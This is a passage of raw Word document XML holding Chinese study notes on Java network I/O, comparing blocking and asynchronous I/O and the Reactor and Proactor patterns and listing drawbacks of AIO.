          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的两个重要步骤：</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>发起</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>请求，和实际的</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络编程的定义里异步和非异步概念的区别就是实际的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作是否阻塞。如果不是就是异步，如果是就是同步。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A334B3" w:rsidRDefault="00A334B3" w:rsidP="00A334B3">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而阻塞和非阻塞的区别在于发起</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求的时候是否会阻塞，如果会就是阻塞，不会就是非阻塞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805196" w:rsidRPr="00805196" w:rsidRDefault="00805196" w:rsidP="00805196">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nio</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架的设计，一般都是采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式，</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reacot</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负责事件的注册、</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>事件的派发；相应地，异步</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有个</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Proactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式，</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Proactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负责</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CompletionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的派发，查看一个典型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写操作的流程来看两者的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805196" w:rsidRPr="00805196" w:rsidRDefault="00805196" w:rsidP="00805196">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reactor:  send(msg) -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列是否为空，如果为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Reactor select -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Writable</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通知用户线程去处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先注销</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Writable(</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多人遇到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu 100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题就在于没有注销）</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Writeable</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果没有完全写入，继续注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OP_WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。注意到，写入的工作还是用户线程在处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00805196" w:rsidRDefault="00805196" w:rsidP="00805196">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Proactor: send(msg) -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列是否为空，如果为空</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发起</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步调用，并注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CompletionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后返回。</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统负责将你的消息写入，并返回结果（写入的字节数）给</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Proactor -&gt; Proactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>派发</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CompletionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可见，写入的工作是操作系统在处理，无需用户线程参与。事实上在</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aio</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,AsynchronousChannelGroup</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就扮演了</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Proactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00805196">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的角色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47974" w:rsidRPr="00A47974" w:rsidRDefault="00A47974" w:rsidP="00A47974">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要操作系统支持，还好</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都支持；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47974" w:rsidRPr="00A47974" w:rsidRDefault="00A47974" w:rsidP="00A47974">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时使用递归调用和异步调用容易把程序员搞晕，代码容易出错；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47974" w:rsidRPr="00A47974" w:rsidRDefault="00A47974" w:rsidP="00A47974">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CompletionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会使用单独的线程跑，容易出现多线程问题，频繁线程上下文切换比较消耗资源；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A47974" w:rsidRDefault="00A47974" w:rsidP="00A47974">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四是异步写要创建队列来缓存需要写入的数据，否则肯定会遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WritePendingException</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47974">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347E4F" w:rsidRPr="00347E4F" w:rsidRDefault="00347E4F" w:rsidP="00A47974">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对应于</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>UNIX</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>网络编程中的时间驱动</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I/o(AIO)</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，它不需要通过多路复用器</w:t>
      </w:r>
      <w:r w:rsidRPr="00347E4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Selector</w:t>
